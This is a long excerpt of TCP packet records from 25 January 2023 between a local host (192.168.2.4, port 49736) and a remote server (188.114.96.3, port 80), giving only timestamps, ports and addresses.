Jan 25, 2023 09:28:21.181890965 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.181910992 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.181917906 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.181937933 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.181961060 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.181981087 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.182001114 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.182012081 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.182029963 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.182040930 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.182059050 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.182080030 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.182096004 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.182110071 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.182120085 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.182138920 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.182158947 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.182176113 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.182187080 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.182208061 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.182250977 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.182662010 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.182682037 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.182713032 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.182723999 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.182743073 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.182765961 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.182780981 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.182801008 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.182820082 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.182831049 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.182848930 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.182862043 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.182881117 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.182900906 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.182921886 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.182944059 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.182952881 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.182974100 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.182982922 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.183001041 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.183015108 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.183029890 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.183048964 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.183068037 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.183079004 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.183098078 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.183121920 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.183129072 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.183147907 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.183157921 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.183176041 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.183197021 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.183229923 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.183609962 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.183629990 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.183650017 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.183660030 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.183679104 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.183698893 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.183723927 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.183731079 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.183738947 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.183757067 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.183778048 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.183803082 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.183809996 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.183829069 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.183849096 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.183860064 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.183878899 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.183898926 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.183918953 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.183929920 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.183952093 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.183959007 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.183975935 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.183995962 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.184009075 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.184029102 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.184051991 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.184062004 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.184079885 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.184101105 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.184122086 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.184132099 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.184149027 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.184760094 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.184797049 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.184813023 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.184829950 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.184849024 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.184871912 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.184883118 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.184901953 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.184916019 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.184966087 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.184984922 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.185003996 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.185014009 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.185033083 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.185046911 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.185060978 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.185081005 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.185101032 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.185112000 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.185131073 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.185149908 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.185163021 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.185183048 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.185206890 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.185214996 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.185231924 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.185249090 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.185262918 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.185282946 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.185302973 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.185323000 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.185336113 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.185367107 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.185856104 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.185878992 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.185898066 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.185909986 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.185930014 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.185949087 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.185966015 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.185977936 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.186000109 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.186007023 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.186024904 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.186045885 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.186057091 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.186075926 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.186094999 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.186109066 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.186125994 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.186146021 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.186155081 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.186175108 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.186188936 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.186208963 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.186228991 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.186235905 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.186249018 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.186264038 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.186284065 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.186294079 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.186311960 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.186331987 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.186342955 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.186362982 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.186395884 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.186428070 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.186467886 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.186486959 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.186506033 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.186525106 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.186543941 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.186563969 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.186578035 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.186588049 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.186602116 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.186621904 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.186641932 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.186662912 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.186672926 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.186702967 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.186711073 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.186731100 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.186748028 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.186759949 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.186779976 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.186798096 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.186810017 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.186841011 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.186868906 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.186904907 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.186954021 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.186964035 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.186995983 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.187031984 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.187041998 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.187060118 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.187077999 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.187108994 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.187484980 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.187505007 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.187527895 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.187535048 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.187553883 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.187563896 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.187582016 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.187602997 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.187628984 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.187649965 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.187669039 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.187688112 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.187707901 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.187716007 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.187735081 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.187746048 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.187766075 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.187779903 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.187804937 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.187813044 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.187834024 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.187841892 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.187860966 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.187880039 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.187891960 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.187911034 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.187930107 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.187942982 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.187958002 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.187971115 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.187985897 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.188007116 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.188025951 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.188035965 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.188054085 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.188062906 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.188081026 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.188100100 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.188117027 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.188129902 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.188148975 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.188178062 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.188601017 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.188622952 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.188643932 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.188668966 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.188677073 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.188695908 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.188704967 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.188725948 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.188746929 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.188755035 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.188775063 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.188793898 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.188805103 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.188822985 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.188839912 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.188849926 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.188889980 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.387967110 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.405339956 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.405396938 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.405440092 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.405476093 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.405518055 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.405560970 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.405581951 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.405622005 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.405667067 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.405684948 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.405729055 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.405771017 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.405790091 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.405832052 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.405874014 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.405906916 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.405941963 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.405985117 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.406009912 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.406047106 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.406090021 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.406111002 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.406152010 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.406196117 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.406239033 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.406258106 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.406301022 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.406327009 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.406368971 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.406419039 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.406452894 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.406481981 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.406527042 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.406605959 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.406625032 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.406667948 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.406708002 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.406771898 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.406814098 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.406853914 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.406872988 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.406920910 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.406935930 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.406976938 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.407033920 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.407077074 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.407095909 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.407141924 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.407155037 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.407196045 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.407236099 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.407257080 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.407295942 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.407340050 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.407362938 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.407399893 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.407440901 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.407469988 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.407504082 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.407548904 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.407567024 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.407608032 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.407649040 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.407697916 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.407711029 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.407751083 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.407793045 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.407835960 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.407855034 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.407855988 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.407901049 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.407947063 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.407989025 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.408010960 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.408046007 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.408066034 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.408109903 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.408153057 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.408195972 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.408237934 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.408265114 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.408277988 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.408318996 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.408360958 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.408380985 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.408422947 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.408466101 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.408508062 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.408530951 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.408576012 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.408590078 CET	49736	80	192.168.2.4	188.114.96.3
Jan 25, 2023 09:28:21.408631086 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.408674002 CET	80	49736	188.114.96.3	192.168.2.4
Jan 25, 2023 09:28:21.408716917 CET	80	49736	188.114.96.3	192.168.2.4
